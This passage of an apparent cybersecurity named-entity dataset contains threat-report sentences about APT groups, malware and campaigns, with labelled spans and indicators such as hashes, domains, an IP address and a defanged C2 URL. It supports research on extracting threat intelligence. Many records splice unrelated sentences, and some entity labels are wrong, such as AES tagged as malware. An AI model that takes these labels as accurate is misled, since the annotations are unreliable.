In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": {"Malware: SWAnalytics": [[25, 36]]}, "info": {"id": "cyberner_stix_valid_000307", "source": "cyberner_stix_valid"}} {"text": "The primary source of data used in this analysis is Palo Alto Networks WildFire , which analyzes malware used in attacks across the world . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"Organization: Palo Alto Networks WildFire": [[52, 79]], "Organization: telecommunications": [[186, 204]], "Organization: government": [[207, 217]], "Organization: defense": [[220, 227]], "Organization: oil": [[230, 233]], "Organization: financial services organizations": [[240, 272]], "Organization: individual victims": [[331, 349]], "Organization: social media": [[358, 370]]}, "info": {"id": "cyberner_stix_valid_000308", "source": "cyberner_stix_valid"}} {"text": "However , the actual timeline of the creation of different variants is unclear . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 . 
This activity is followed quickly by additional access and persistent mechanisms .", "spans": {"Malware: IRONHALO": [[335, 343]], "Indicator: AcroRd32Info.exe.exe": [[346, 366]], "Indicator: a8ccb2fc5fec1b89f778d93096f8dd65": [[367, 399]]}, "info": {"id": "cyberner_stix_valid_000309", "source": "cyberner_stix_valid"}} {"text": "Port 6205 : Gmail extraction service . activity originated from three separate IP addresses , all located in Chengdu , China . With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos . Education accounts for a huge proportion of known Vice Society attacks .", "spans": {"System: Gmail": [[12, 17]], "Organization: Unit 42": [[239, 246]], "Organization: Talos": [[253, 258]]}, "info": {"id": "cyberner_stix_valid_000310", "source": "cyberner_stix_valid"}} {"text": "KASPERAGENT is Microsoft Windows malware used in efforts targeting users in the United States , Israel , Palestinian Territories , and Egypt since July 2015 .", "spans": {"Malware: KASPERAGENT": [[0, 11]], "Organization: Microsoft": [[15, 24]], "System: Windows": [[25, 32]]}, "info": {"id": "cyberner_stix_valid_000311", "source": "cyberner_stix_valid"}} {"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": {"Malware: Microsoft Excel files": [[57, 78]], "Malware: maldoc": [[155, 161]], "Organization: ICS": [[186, 189]], "Organization: OT staff": [[193, 201]]}, "info": {"id": "cyberner_stix_valid_000312", "source": "cyberner_stix_valid"}} {"text": "FireEye has detected more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions . 
The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: anti-government separatists": [[336, 363]]}, "info": {"id": "cyberner_stix_valid_000313", "source": "cyberner_stix_valid"}} {"text": "Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": {}, "info": {"id": "cyberner_stix_valid_000314", "source": "cyberner_stix_valid"}} {"text": "] 133 ” as a main C2 address , and there is only one domain that is hosted on this dedicated server – iliageram [ . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user . ScarCruft tools : 032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": {"Organization: Twitter user": [[221, 233]], "Indicator: 032ed0cd234f73865d55103bf4ceaa22": [[254, 286]]}, "info": {"id": "cyberner_stix_valid_000315", "source": "cyberner_stix_valid"}} {"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 . The content of the ZIP attachment it displayed in its UI was not the one it extracted! This sample challenges gateways . 
Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": {"Organization: Lookout": [[0, 7]]}, "info": {"id": "cyberner_stix_valid_000316", "source": "cyberner_stix_valid"}} {"text": "Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . Some hackers even went onto use the Cisco exploits in the wild .", "spans": {"Organization: Cisco": [[178, 183]], "Vulnerability: exploits": [[184, 192]]}, "info": {"id": "cyberner_stix_valid_000317", "source": "cyberner_stix_valid"}} {"text": "Mandiant 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"Organization: Mandiant": [[0, 8]], "Organization: private security companies": [[81, 107]], "Indicator: BalkanDoor": [[185, 195]], "Vulnerability: exploit": [[344, 351]], "Vulnerability: CVE-2018-20250": [[381, 395]]}, "info": {"id": "cyberner_stix_valid_000318", "source": "cyberner_stix_valid"}} {"text": "In 2013 , the group deployed a watering hole attack , also known as a strategic web compromise to infect victims with their backdoor . 
Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"Organization: Symantec": [[135, 143]], "Organization: customers": [[215, 224]]}, "info": {"id": "cyberner_stix_valid_000319", "source": "cyberner_stix_valid"}} {"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot ’ s configuration , which contains C2 URLs and a targeted applications list . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": {"Malware: EventBot": [[83, 91]], "Malware: Bemstour": [[196, 204]], "Organization: Symantec": [[213, 221]], "Malware: AES": [[469, 472]]}, "info": {"id": "cyberner_stix_valid_000320", "source": "cyberner_stix_valid"}} {"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection . Ssdeep : 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu . 
The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"Organization: Talos": [[347, 352]], "Organization: Open Babel": [[383, 393]]}, "info": {"id": "cyberner_stix_valid_000321", "source": "cyberner_stix_valid"}} {"text": "For instance , the earliest known CozyDuke version utilized a feature of the Microsoft Visual C++ compiler known as run-time error checking .", "spans": {"Malware: CozyDuke": [[34, 42]], "Organization: Microsoft": [[77, 86]]}, "info": {"id": "cyberner_stix_valid_000322", "source": "cyberner_stix_valid"}} {"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com . The most common communication mode for a RAT is to act as a client to a remote server . NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer . 
PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"Malware: NetWeird": [[230, 238]], "Malware: Trojan.Netweird.B": [[241, 258]], "Malware: Trojan": [[275, 281]]}, "info": {"id": "cyberner_stix_valid_000323", "source": "cyberner_stix_valid"}} {"text": "CosmicDuke ’s information stealing functionality includes : Keylogging , Taking screenshots , Stealing clipboard contents , Stealing user files with file extensions that match a predefined list , Exporting the users cryptographic certificates including private keys , Collecting user credentials , including passwords , for a variety of popular chat and email programs as well as from web browsers CosmicDuke may use HTTP , HTTPS , FTP or WebDav to exfiltrate the collected data to a hardcoded C&C server .", "spans": {"Malware: CosmicDuke": [[0, 10], [398, 408]]}, "info": {"id": "cyberner_stix_valid_000324", "source": "cyberner_stix_valid"}} {"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated . APT17 : 69.80.72.165 . 
It also sends collected browser data to another script by sending a POST request to “ hxxp://[c2_hostname]/groups / count / write.php ” .", "spans": {"Indicator: 69.80.72.165": [[312, 324]]}, "info": {"id": "cyberner_stix_valid_000325", "source": "cyberner_stix_valid"}} {"text": "The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt .", "spans": {}, "info": {"id": "cyberner_stix_valid_000326", "source": "cyberner_stix_valid"}} {"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": {"Organization: FireEye": [[54, 61]]}, "info": {"id": "cyberner_stix_valid_000327", "source": "cyberner_stix_valid"}} {"text": "In particular , we will focus on the samples SHA-1 AA0FA4584768CE9E16D67D8C529233E99FF1BBF0 and 48BC113EC8BA20B8B80CD5D4DA92051A19D1032B . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[139, 159]], "Organization: banker": [[203, 209]]}, "info": {"id": "cyberner_stix_valid_000328", "source": "cyberner_stix_valid"}} {"text": "Lateral movement to other machines on the network .", "spans": {}, "info": {"id": "cyberner_stix_valid_000329", "source": "cyberner_stix_valid"}} {"text": "Secondly , it underlines their boldness , arrogance and self-confidence ; they are clearly confident in both their ability to compromise their targets even when their tools and techniques are already publicly known , and critically , they appear to be extremely confident in their ability to act with impunity . 
2015 : Continuing surgical strikes with CosmicDuke .", "spans": {"Malware: CosmicDuke": [[352, 362]]}, "info": {"id": "cyberner_stix_valid_000330", "source": "cyberner_stix_valid"}} {"text": "While doing our investigation we were able to identify other malware packages with different names . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX . In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility . The backdoor ’s primary functionality involves retrieving and executing additional modules .", "spans": {}, "info": {"id": "cyberner_stix_valid_000331", "source": "cyberner_stix_valid"}} {"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000332", "source": "cyberner_stix_valid"}} {"text": "Fileless execution and persistence – In targeted campaigns , threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination .", "spans": {}, "info": {"id": "cyberner_stix_valid_000333", "source": "cyberner_stix_valid"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . 
At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"Malware: document": [[34, 42]], "Vulnerability: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "Malware: Java related application": [[125, 149]], "Indicator: Java file": [[237, 246]]}, "info": {"id": "cyberner_stix_valid_000334", "source": "cyberner_stix_valid"}} {"text": "The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder .", "spans": {"Indicator: .exe": [[154, 158]]}, "info": {"id": "cyberner_stix_valid_000335", "source": "cyberner_stix_valid"}} {"text": "We don’t know for sure who is responsible for this campaign , but digging into the passive DNS results led us to some breadcrumbs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000336", "source": "cyberner_stix_valid"}} {"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"Indicator: kontrakt87.doc": [[164, 178]], "Organization: telecommunications service": [[200, 226]], "Organization: MegaFon": [[241, 248]], "Organization: mobile phone operator": [[267, 288]]}, "info": {"id": "cyberner_stix_valid_000337", "source": "cyberner_stix_valid"}} {"text": "Some of the indicators in the following post were published on AlienVault OTX on 6/13 .", "spans": {"Organization: AlienVault": [[63, 73]]}, "info": {"id": "cyberner_stix_valid_000338", "source": "cyberner_stix_valid"}} {"text": "Allows an application to write SMS messages . 
The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . FIN7 : Carbanak Group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000339", "source": "cyberner_stix_valid"}} {"text": "The ‘ ejtmjealr.com ’ domain is particularly interesting due to a similar domain , ‘ ejdqzkd.com ’ being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year .", "spans": {"Indicator: ejtmjealr.com": [[6, 19]], "Indicator: ejdqzkd.com": [[85, 96]], "Organization: CERT.PL": [[138, 145]], "Malware: Nymaim": [[166, 172]]}, "info": {"id": "cyberner_stix_valid_000340", "source": "cyberner_stix_valid"}} {"text": "Once ZeroT is running , we observed that the fake User-Agent used in the requests changed from “ Mozilla/6.0 ( compatible ; MSIE 10.0 ; Windows NT 6.2 ; Tzcdrnt/6.0 ) ” to “ Mozilla/6.0 ( compatible ; MSIE 11.0 ; Windows NT 6.2 ) ” , thus removing the “ Tzcdrnt ” typo observed in previous versions .", "spans": {"Malware: ZeroT": [[5, 10]], "System: Windows": [[136, 143], [213, 220]]}, "info": {"id": "cyberner_stix_valid_000341", "source": "cyberner_stix_valid"}} {"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . On Nov. 
27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": {"Organization: financial": [[137, 146]], "Organization: nations": [[158, 165]], "Organization: Cisco 's Talos": [[198, 212]]}, "info": {"id": "cyberner_stix_valid_000342", "source": "cyberner_stix_valid"}} {"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": {"Malware: XREFs": [[220, 225]]}, "info": {"id": "cyberner_stix_valid_000343", "source": "cyberner_stix_valid"}} {"text": "Take advantage of native mitigations built into Windows 10 . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": {"Malware: Spindest": [[89, 97]], "Malware: PcClient sample": [[155, 170]]}, "info": {"id": "cyberner_stix_valid_000344", "source": "cyberner_stix_valid"}} {"text": "( We named the spyware \" Exodus '' after this Command & Control domain name . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown . Executes arbitrary commands via the CMD shell . 
Rather than limiting security to searching for a series of stringent profiles , security teams can attempt to analyze threat indicators in real time .", "spans": {"Organization: FireEye": [[97, 104]], "Organization: security": [[419, 427]], "Organization: security teams": [[478, 492]]}, "info": {"id": "cyberner_stix_valid_000345", "source": "cyberner_stix_valid"}} {"text": "However , it is unusual for the group to use this technique to deliver one of its malware components directly .", "spans": {}, "info": {"id": "cyberner_stix_valid_000346", "source": "cyberner_stix_valid"}} {"text": "The Patchwork attack group has been targeting more than just government-associated organizations . The activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": {"Organization: government-associated organizations": [[61, 96]]}, "info": {"id": "cyberner_stix_valid_000347", "source": "cyberner_stix_valid"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": {"Malware: files": [[4, 9]], "Vulnerability: Microsoft Office vulnerability": [[33, 63]], "Vulnerability: CVE-2012-0158": [[66, 79]], "Malware: BIFROST-derived backdoors": [[191, 216]], "Malware: BIFROSE": [[219, 226]], "Malware: KIVARS": [[229, 235]], "Malware: XBOW": [[242, 246]]}, "info": {"id": "cyberner_stix_valid_000348", "source": "cyberner_stix_valid"}} {"text": "Here are just some of them : ngglobal – FirebaseCloudMessaging topic name Issuer : CN = negg – from several certificates negg.ddns [ . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . 
In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"Organization: economic": [[169, 177]], "Organization: political": [[182, 191]], "Organization: military": [[267, 275]], "Organization: governments": [[278, 289]], "Organization: defense industries": [[292, 310]], "Organization: media": [[321, 326]], "Organization: media organizations": [[422, 441]]}, "info": {"id": "cyberner_stix_valid_000349", "source": "cyberner_stix_valid"}} {"text": "HammerDuke is a simple backdoor that is apparently designed for similar use cases as SeaDuke .", "spans": {"Malware: HammerDuke": [[0, 10]], "Malware: SeaDuke": [[85, 92]]}, "info": {"id": "cyberner_stix_valid_000350", "source": "cyberner_stix_valid"}} {"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the new toolsets were also given “ Duke ” -derived names , and thus the threat actor operating the toolsets started to be commonly referred to as “ the Dukes ” .", "spans": {"Malware: MiniDuke": [[119, 127]]}, "info": {"id": "cyberner_stix_valid_000351", "source": "cyberner_stix_valid"}} {"text": "To be sure though , I needed to find other samples and see how they stacked up against this one .", "spans": {}, "info": {"id": "cyberner_stix_valid_000352", "source": "cyberner_stix_valid"}} {"text": "We decided to take a peek under the hood of a modern member of the Asacub family . Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different . Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems . 
PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"Malware: Asacub": [[67, 73]]}, "info": {"id": "cyberner_stix_valid_000353", "source": "cyberner_stix_valid"}} {"text": "According to RiskIQ ’ s PassiveTotal , the domain expired 7 months ago . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": {"System: RiskIQ": [[13, 19]], "Malware: PlugX": [[279, 284]], "Malware: NetTraveler": [[287, 298]], "Malware: ZeroT": [[305, 310]]}, "info": {"id": "cyberner_stix_valid_000354", "source": "cyberner_stix_valid"}} {"text": "These incidents show a novel infection vector being used by APT28 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000355", "source": "cyberner_stix_valid"}} {"text": "If Arabic keyboard and language settings are not found on the machine , the backdoor will not carry out its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000356", "source": "cyberner_stix_valid"}} {"text": "The Spark payload is a custom backdoor likely developed by the MoleRATs group .", "spans": {"Malware: Spark": [[4, 9]]}, "info": {"id": "cyberner_stix_valid_000357", "source": "cyberner_stix_valid"}} {"text": "Since Android version 7 ( Nougat ) this information is gathered using other means , perhaps inferring the devices used by potential victim run older versions of Android . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . 
We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"System: Android": [[6, 13], [161, 168]], "System: Nougat": [[26, 32]], "Organization: citizens": [[370, 378], [382, 390]]}, "info": {"id": "cyberner_stix_valid_000358", "source": "cyberner_stix_valid"}} {"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . First attack of this campaign took place in May 2018 . Arbor also published APT research on this group , and named it ‘Donot’ . Donot attacked government agencies , aiming for classified intelligence . We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for Cyber Espionage . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . In the latest attack , Donot group is targeting Pakistani businessman working in China . Two unique malware frameworks , EHDevel and yty , are developed by attackers . 
wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown . 
Either ACT , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . Either ACT , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . According to this new alert , Hidden Cobra the U.S. government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . Lazarus is a very active attack group involved in both cyber crime and espionage . The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . 
In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . In recent years , Lazarus has also become involved in financially motivated attacks . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . 
The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Gamaredon Group is an alleged Russian threat group . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . 
Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools . We can observe that the sample is very recent , created on Thursday , July 4 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . 
In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years. 
However , Symantec has now found evidence that the Buckeye Cyber Espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"Organization: Kaspersky Lab": [[147, 160]], "Organization: NSA": [[206, 209]], "Malware: doppelganger webpages": [[281, 302], [3709, 3730]], "Organization: Shanghai Cooperation Organization": [[672, 705]], "Organization: Arbor": [[932, 937]], "Organization: government agencies": [[1020, 1039]], "Malware: Spear phishing": [[1308, 1322]], "Organization: Pakistani businessman": [[1453, 1474]], "Malware: EHDevel": [[1526, 1533]], "Malware: yty": [[1538, 1541]], "Indicator: wuaupdt.exe": [[1573, 1584], [1720, 1731]], "Malware: CMD backdoor": [[1590, 1602]], "Organization: (DNC)": [[2304, 2309], [2441, 2446]], "Organization: (WADA)": [[2513, 2519]], "Organization: Chinese universities": [[3302, 3322]], "Organization: foreign governments": [[3768, 3787]], "Organization: telecommunications": [[3790, 3808]], "Organization: military": [[3815, 3823]], "Organization: banks": [[4364, 4369]], "Organization: financial": [[4757, 4766], [8593, 8602]], "Organization: Bangladesh Central Bank": [[4910, 4933]], "Malware: WannaCry": [[4942, 4950]], "Indicator: nbtscan": [[5025, 5032]], "Indicator: powercat": [[5037, 5045]], "Organization: banks'": [[5193, 5199]], "Malware: (AIX)": [[5494, 5499]], "Malware: scripts": 
